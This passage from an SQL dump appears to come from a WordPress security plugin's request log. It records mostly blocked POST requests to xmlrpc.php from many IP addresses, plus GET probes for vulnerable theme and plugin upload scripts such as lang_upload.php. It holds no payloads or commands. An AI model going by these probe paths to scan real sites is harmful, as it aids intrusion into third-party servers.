Safari\\/537.36\"}','S9cXwjJhmZb5xIGVuMNBegTk',0,1680763536.7916,332,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/footysquare/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','S69LbDvPAW8iQXMBqUV2rgjO',0,1680763538.0627,296,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','E7gOnbN09XMUrZBjHQ8DulCY',0,1680763540.3984,295,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','Zc0OFLEzMH9sbSIJR2vaGXQg',0,1680763541.8578,305,'','GET',403,0,700,0,1,'',0),('154.221.18.150',2598179478,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','FNuVthbyr2xdaCvXokIm5SzJ',0,1680764523.8325,684,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','sVBuGP5F0a3JOmSv1bCoWTL6',0,1680764525.4177,869,'','POST',403,0,515,0,1,'',0),('185.198.27.128',3116768128,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','py1vjVJeEQzG7RfiIL0MaZ6W',0,1680764533.3588,589,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','BeAYbgS7lzDQIPa3WjUm5Miw',0,1680764540.2799,593,'','POST',403,0,515,0,1,'',0),('86.48.23.13',1445992205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','1qLm9BZdyn5EV7CSi6epWHGz',0,1680764549.7282,1718,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','el91bndJLtYCK4saHTvFIfOj',0,1680764550.4841,1873,'','POST',403,0,515,0,1,'',0),('91.206.201.230',1540278758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MyFvIigYJzQAGXfSNTDhqU6p',0,1680764559.3746,659,'','POST',403,0,515,0,1,'',0),('134.19.179.147',2249438099,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','560BEzyhpS7NUqMuGA4n91Jg',0,1680764953.3761,928,'','POST',403,0,515,0,1,'',0),('195.206.105.227',3285084643,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xSs4zhZktBTw0rq9aOyfjDdv',0,1680767076.2685,670,'','POST',403,0,515,0,1,'',0),('195.206.105.203',3285084619,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wJZ1SqNAFyn5cHEdVx8zgtQL',0,1680767580.7594,750,'','POST',403,0,515,0,1,'',0),('184.75.221.203',3091979723,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uinUxOmKYTkICbN9BQwDMWfe',0,1680768252.4739,677,'','POST',403,0,515,0,1,'',0),('184.75.221.203',3091979723,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fz8Uil4h19kWa2qbO3pDVrJS',0,1680768389.1009,580,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Dt0g17SNvZT82r9kqGduImab',0,1680769024.6705,657,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','Lj0GgPnV3reTNsFB96um1XMt',0,1680769029.1758,600,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','efqCVydM5YcQmp6DaUJ2wrBO',0,1680769031.8497,624,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','oeOwmJlSFEc0uPz69g1D3YGX',0,1680769034.2974,562,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','g5vFtHbzrRqsGVPUYmdN6Q1n',0,1680769040.9406,851,'','POST',403,0,515,0,1,'',0),('198.38.88.243',3324401907,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','mvEncuzjOeZt6Iy1GhV8NpX7',0,1680769044.4541,1417,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Vr3k8LnIdvpi1e6U0GRoFAgZ',0,1680769055.7922,585,'','POST',403,0,515,0,1,'',0),('173.212.199.147',2916403091,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','JrZBAclnzegGq6KXPDEv92Fs',0,1680769060.9775,599,'','POST',403,0,515,0,1,'',0),('34.231.174.129',585608833,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','8LAutzQk7c1nowBNxiSC3GpW',0,1680769061.7483,636,'','POST',403,0,515,0,1,'',0),('74.208.160.149',1255186581,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','bFS9rjixfpAGPM3kQDzN2XWE',0,1680769064.0579,565,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','KzyiS84LIPdYo0ZH3wf5nXCO',0,1680769086.9469,572,'','POST',403,0,515,0,1,'',0),('184.75.223.195',3091980227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3hdL2HCzG9NkPFIAqK1ZJDxX',0,1680769283.6621,565,'','POST',403,0,515,0,1,'',0),('185.185.89.10',3115931914,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','M2oFQcVi8fyOx5slrgURzDm3',0,1680769594.3384,567,'','POST',403,0,515,0,1,'',0),('51.75.194.213',860603093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','WanwsN2cqYdgxlt4oZ8jDrpm',0,1680769600.1482,591,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','bnZfx9YM7KDOWCjwE5H0ITPe',0,1680769611.8298,682,'','POST',403,0,515,0,1,'',0),('188.128.149.108',3162543468,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','vgVBnrW1tDoYxdm9RzE8lHJq',0,1680769612.7762,573,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','thYOwFpMEyWS6HZzbJBk2f5c',0,1680769615.7434,543,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','8viMbIyBRmGjpXnVU9qS4Jct',0,1680769618.5086,561,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','6ryDavheCs5b3d0w4GWJjLn1',0,1680769623.9494,561,'','POST',403,0,515,0,1,'',0),('35.195.46.200',599994056,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','e6UYgRyK5jmA4ibS2IWZJtzG',0,1680769627.8913,554,'','POST',403,0,515,0,1,'',0),('62.102.148.189',1046910141,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QlWndgzLGNrAfOYSUToE1sZ7',0,1680772938.4640,658,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','b4wDfOR2e7lAZoGt0xzaI6Km',0,1680773077.9787,897,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','LPHuaehQNpwEqZ1yTilrnsUM',0,1680773078.8771,1467,'','POST',403,0,515,0,1,'',0),('185.216.214.24',3117995544,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Jsy8fKYHQEmNX5WBhGrd2FVM',0,1680773078.9724,1390,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','smGgVlfocYBKpkZrQ61CwvI5',0,1680773091.5703,1498,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','QbmJFxZa2huwH6eMgjyDLcGB',0,1680773091.6473,2193,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','MIEjoKgzcS8p2dGqHNtrR70Z',0,1680773108.3303,618,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','2KOVjRQuL8hlA9gdikSXyGaW',0,1680773112.7208,695,'','POST',403,0,515,0,1,'',0),('139.99.61.204',2338536908,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','U92acZMxk1hTqBFKdwJgj5PS',0,1680773118.0629,626,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','ncIFmKAMg1bVqCwhOjS3kDUl',0,1680773125.1083,628,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','jL32YftnowP70NiKqdDbXuSr',0,1680773128.7452,558,'','POST',403,0,515,0,1,'',0),('82.102.28.107',1382423659,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gvxsA0dLpl3No49C5qySWOeu',0,1680774132.2078,615,'','POST',403,0,515,0,1,'',0),('217.138.195.27',3649749787,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tashDAUmMO9nWRlJQL87c3iS',0,1680774801.8271,951,'','POST',403,0,515,0,1,'',0),('184.75.221.171',3091979691,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qNSebIFdrUPh9lwcR7KmDnTy',0,1680776837.4354,604,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','w3L7VyqNOPt1f8X9vUFJGjuZ',0,1680777760.2063,1067,'','POST',403,0,515,0,1,'',0),('103.3.1.158',1728250270,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','cBAW2ME4uVh0psmktJ73jFrn',0,1680777760.6616,1084,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1HDZs6PnTbRILtGlu4K2vUXN',0,1680777761.8629,594,'','POST',403,0,515,0,1,'',0),('188.225.23.115',3168868211,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','UdZTv5nbpVcDK7yOxHYifmrR',0,1680777770.8241,579,'','POST',403,0,515,0,1,'',0),('54.38.197.19',908510483,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','QCADlaFsn8621BVtheRbJcIw',0,1680777778.4381,572,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','QFgSPEdWy0Zh3qK1Bb8xfnz2',0,1680777786.6118,547,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','IeM1fT75BNYzSyDl6xULbkpJ',0,1680777793.9051,590,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/?action=logout&_wpnonce=57287f9088','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/\"}','Z1ow4a8DvcgeFAMdVTlXSq60',3,1680778132.6282,380,'','GET',302,0,600,0,1,'',510),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','kwDxVJ7avKU06Be5LAmgruqd',0,1680779749.1184,1644,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','qYATZbye7Ej2KkCH46vigO0P',0,1680779759.1430,2000,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','PDi7xQSkwXVpTbYU0aG1Rr4d',0,1680779759.4518,1913,'','POST',403,0,515,0,1,'',0),('163.172.60.103',2745973863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','MdKlHaIh6oN4tVDCpL91m72y',0,1680779759.5554,1919,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','acbfHFZRQkrG4SJNIulCzBdL',0,1680779769.8280,570,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','Uzk8uKCOhW7SRjcJV4PpHFI0',0,1680779778.6775,628,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','qAYOIxSfNXiZaWz7ldvUkDc3',0,1680779782.5272,594,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','GSd58iegrAXVkRpTyLqFfw09',0,1680779785.2534,552,'','POST',403,0,515,0,1,'',0),('92.42.111.218',1546285018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','s1Cl6Ww5BL9SFV0NH3xfMJ7Z',0,1680779790.4616,578,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','r9Xpz6w1PDAcLjMROGK7bFI2',0,1680779791.5249,582,'','POST',403,0,515,0,1,'',0),('107.189.13.115',1807551859,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','z0eCXmJynN7fTiDG4Rq1hwEc',0,1680783288.7202,1587,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','FXCMTb8ykNGj32evhw1sigRJ',0,1680783287.3853,3584,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','z6q2JtIWQHy3c1uAjS85Frlk',0,1680783298.5388,580,'','POST',403,0,515,0,1,'',0),('162.0.217.70',2717964614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','A5fFqw3LzQVBtl4ET2kdbivO',0,1680783300.5372,793,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','FhPeZRMiXDIzSpL1sOGlx0gC',0,1680783307.4722,644,'','POST',403,0,515,0,1,'',0),('92.204.55.166',1556887462,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','15tKnSDxBNRiekM9b6sFX2lf',0,1680783310.9178,583,'','POST',403,0,515,0,1,'',0),('103.152.248.16',1738078224,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','onQZbKfhNy0OcMr71Ajdl8kL',0,1680783314.9317,661,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','IAstfleUZQvwzO3HpG9LckJD',0,1680783335.5098,562,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','pIdU8Sa6fve0YBPQJHCOFiA7',0,1680783337.9765,649,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','U8c7bjIygasYS4Dr0TpfxH6i',3,1680784813.8199,2927,'','POST',302,0,600,0,1,'',510),('184.75.223.195',3091980227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','s1MEzhRLaJrAeOZtxiIl4Cjw',0,1680786550.8627,1523,'','POST',403,0,515,0,1,'',0),('31.170.22.49',531240497,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','LwtW1mYVDuajNHlkhfBgzK6b',0,1680789085.7546,3981,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','OZeYNgnjDRvKp6xU32FJfXmC',0,1680789091.6948,609,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 